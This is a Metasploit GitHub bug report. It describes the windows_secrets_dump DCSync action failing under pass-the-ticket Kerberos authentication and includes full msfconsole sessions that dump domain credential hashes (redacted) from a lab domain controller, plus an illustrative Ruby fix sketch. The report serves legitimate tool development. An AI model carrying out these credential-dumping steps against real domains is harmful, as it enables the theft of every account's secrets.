
Windows Secrets Dump DOMAIN action (DCSync) fails with PTT #18312

Closed
zeroSteiner opened this issue Aug 23, 2023 · 0 comments · Fixed by #18419
Labels: bug, confirmed (Issues confirmed by a committer)

Comments

@zeroSteiner (Contributor)

The windows_secrets_dump module's DOMAIN action fails when the authentication is configured for pass-the-ticket style authentication. That is when the user is authenticating with a Kerberos ticket and not a password. It should be noted that the module will work if a password is set and the authentication is configured for Kerberos because the password will be used for the DCERPC client.

To reproduce the issue:

  1. Have a standard domain controller target
  2. Use the windows_secrets_dump module and set the datastore options to authenticate with Kerberos
  3. Set the necessary datastore options to authenticate with Kerberos.
  4. Run the domain action with run ACTION=DOMAIN. See the debug messages showing that Kerberos tickets were issued.
  5. Unset the password
  6. Run the domain action again and see the debug messages showing that the cached Kerberos ticket was used. See the action failed.
Example Output
msf6 > use windows_secrets_dump

Matching Modules
================

   #  Name                                   Disclosure Date  Rank    Check  Description
   -  ----                                   ---------------  ----    -----  -----------
   0  auxiliary/gather/windows_secrets_dump                   normal  No     Windows Secrets Dump


Interact with a module by name or index. For example info 0, use 0 or use auxiliary/gather/windows_secrets_dump

[*] Using auxiliary/gather/windows_secrets_dump
msf6 auxiliary(gather/windows_secrets_dump) > set RHOSTS 192.168.159.10
set SMBUserRHOSTS => 192.168.159.10
msf6 auxiliary(gather/windows_secrets_dump) > set SMBUser smcintyre
SMBUser => smcintyre
msf6 auxiliary(gather/windows_secrets_dump) > set SMBPass Password1!
SMBPass => Password1!
msf6 auxiliary(gather/windows_secrets_dump) > set SMBDomain msflab.local
SMBDomain => msflab.local
msf6 auxiliary(gather/windows_secrets_dump) > set DomainControllerRhost 192.168.159.10
DomainControllerRhost => 192.168.159.10
msf6 auxiliary(gather/windows_secrets_dump) > set SMB::RHOSTNAME dc.msflab.local
SMB::RHOSTNAME => dc.msflab.local
msf6 auxiliary(gather/windows_secrets_dump) > set SMB::Auth kerberos 
SMB::Auth => kerberos
msf6 auxiliary(gather/windows_secrets_dump) > klist -d
Kerberos Cache
==============
No tickets

msf6 auxiliary(gather/windows_secrets_dump) > run ACTION=DOMAIN
[*] Running module against 192.168.159.10

[+] 192.168.159.10:445 - 192.168.159.10:88 - Received a valid TGT-Response
[*] 192.168.159.10:445 - 192.168.159.10:445 - TGT MIT Credential Cache ticket saved to /home/smcintyre/.msf4/loot/20230823164139_default_192.168.159.10_mit.kerberos.cca_063196.bin
[+] 192.168.159.10:445 - 192.168.159.10:88 - Received a valid TGS-Response
[*] 192.168.159.10:445 - 192.168.159.10:445 - TGS MIT Credential Cache ticket saved to /home/smcintyre/.msf4/loot/20230823164139_default_192.168.159.10_mit.kerberos.cca_281500.bin
[+] 192.168.159.10:445 - 192.168.159.10:88 - Received a valid delegation TGS-Response
[*] 192.168.159.10:445 - Service RemoteRegistry is in stopped state
[*] 192.168.159.10:445 - Starting service...
[*] 192.168.159.10:445 - Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] 192.168.159.10:445 - Using the DRSUAPI method to get NTDS.DIT secrets
[*] 192.168.159.10:445 - SID enumeration progress -  0 / 11 ( 0.00%)
[*] 192.168.159.10:445 - SID enumeration progress - 11 / 11 (  100%)
[redacted]
[*] 192.168.159.10:445 - Cleaning up...
[*] 192.168.159.10:445 - Stopping service RemoteRegistry...
[*] Auxiliary module execution completed
msf6 auxiliary(gather/windows_secrets_dump) > set --clear SMBPass
SMBPass => 
msf6 auxiliary(gather/windows_secrets_dump) > run ACTION=DOMAIN
[*] Running module against 192.168.159.10

[*] 192.168.159.10:445 - 192.168.159.10:88 - Using cached credential for cifs/[email protected] [email protected]
[*] 192.168.159.10:445 - Service RemoteRegistry is already running
[*] 192.168.159.10:445 - Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] 192.168.159.10:445 - Using the DRSUAPI method to get NTDS.DIT secrets
[*] 192.168.159.10:445 - SID enumeration progress -  0 / 11 ( 0.00%)
[*] 192.168.159.10:445 - SID enumeration progress - 11 / 11 (  100%)
[*] 192.168.159.10:445 - Cleaning up...
[-] 192.168.159.10:445 - Auxiliary failed: NoMethodError undefined method `encode' for nil:NilClass
[-] 192.168.159.10:445 - Call stack:
[-] 192.168.159.10:445 -   /home/smcintyre/.rvm/gems/ruby-3.0.4@metasploit-framework/gems/ruby_smb-3.2.5/lib/ruby_smb/utils.rb:5:in `safe_encode'
[-] 192.168.159.10:445 -   /home/smcintyre/.rvm/gems/ruby-3.0.4@metasploit-framework/gems/ruby_smb-3.2.5/lib/ruby_smb/dcerpc/client.rb:124:in `initialize'
[-] 192.168.159.10:445 -   /home/smcintyre/Repositories/metasploit-framework/modules/auxiliary/gather/windows_secrets_dump.rb:631:in `new'
[-] 192.168.159.10:445 -   /home/smcintyre/Repositories/metasploit-framework/modules/auxiliary/gather/windows_secrets_dump.rb:631:in `connect_drs'
[-] 192.168.159.10:445 -   /home/smcintyre/Repositories/metasploit-framework/modules/auxiliary/gather/windows_secrets_dump.rb:796:in `dump_ntds_hashes'
[-] 192.168.159.10:445 -   /home/smcintyre/Repositories/metasploit-framework/modules/auxiliary/gather/windows_secrets_dump.rb:1131:in `run'
[*] Auxiliary module execution completed
msf6 auxiliary(gather/windows_secrets_dump) > set SMBPass ''
SMBPass => 
msf6 auxiliary(gather/windows_secrets_dump) > run ACTION=DOMAIN
[*] Running module against 192.168.159.10

[*] 192.168.159.10:445 - 192.168.159.10:88 - Using cached credential for cifs/[email protected] [email protected]
[*] 192.168.159.10:445 - Service RemoteRegistry is already running
[*] 192.168.159.10:445 - Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] 192.168.159.10:445 - Using the DRSUAPI method to get NTDS.DIT secrets
[*] 192.168.159.10:445 - SID enumeration progress -  0 / 11 ( 0.00%)
[*] 192.168.159.10:445 - SID enumeration progress - 11 / 11 (  100%)
[-] 192.168.159.10:445 - Auxiliary aborted due to failure: unexpected-reply: [RubySMB::Dcerpc::Error::InvalidPacket] Error reading the RubySMB::Dcerpc::Response response
[*] Auxiliary module execution completed
msf6 auxiliary(gather/windows_secrets_dump) > 

Note that if the password is an empty string, you'll get one error and that if the password is cleared with set --clear SMBPass that you'll get a different error. In both cases the module fails.

The desired outcome is that this action should succeed using only Kerberos tickets for authentication, given that the account has the necessary permissions, of course.

I am pretty confident that the issue is related to the DCERPC client requiring password authentication. It will probably need to be updated with some mechanism to allow the authentication to be replaced with Metasploit's Kerberos authenticator in a similar manner to what the RubySMB::Client uses.
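An added illustration of the failure mode described above (not RubySMB or Metasploit code; `naive_safe_encode`, `Creds` and `resolve_dcerpc_auth` are hypothetical stand-ins): a helper that mirrors the shape of the `safe_encode` call in the trace crashes on `nil` but passes an empty string through, which is why clearing the password and setting it to `''` surface as two different errors, while an explicit resolver makes the ticket-only case a first-class choice instead of an accidental code path.

```ruby
# Mirrors the shape of the failing call in the trace: #encode is invoked on
# whatever was passed in, so a nil password raises NoMethodError, while an
# empty string encodes fine and the problem only shows up later as a
# protocol-level error. (Hypothetical stand-in, not ruby_smb's code.)
def naive_safe_encode(str, encoding = 'UTF-8')
  str.encode(encoding)
end

# Classify what happens for a given password value.
def symptom_for(password)
  encoded = naive_safe_encode(password)
  encoded.empty? ? :empty_password_sent : :password_ok
rescue NoMethodError
  :nil_password_crash
end

# Constructed container for the two kinds of authentication material the
# module can hold: a password and/or a cached Kerberos ticket.
Creds = Struct.new(:password, :kerberos_ticket, keyword_init: true)

class AuthResolutionError < StandardError; end

# Decide up front which material the DCERPC connection should authenticate
# with. A present, non-empty password wins; otherwise a cached ticket is
# used; otherwise fail loudly with a message a user can act on, rather than
# letting nil reach an encode call deep inside the client.
def resolve_dcerpc_auth(creds)
  pw = creds.password
  return :password unless pw.nil? || pw.empty?
  return :kerberos_ticket if creds.kerberos_ticket
  raise AuthResolutionError,
        'no password set and no cached Kerberos ticket available'
end

if __FILE__ == $PROGRAM_NAME
  puts "nil password:   #{symptom_for(nil)}"
  puts "empty password: #{symptom_for('')}"
  puts "ticket only:    #{resolve_dcerpc_auth(Creds.new(password: nil, kerberos_ticket: 'TGT-placeholder'))}"
end
```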

@smcintyre-r7 smcintyre-r7 added the confirmed Issues confirmed by a committer label Oct 3, 2023
@smcintyre-r7 smcintyre-r7 linked a pull request Oct 3, 2023 that will close this issue